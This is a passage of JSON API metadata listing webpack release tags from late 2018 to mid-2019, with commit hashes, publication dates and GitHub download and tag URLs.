66ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar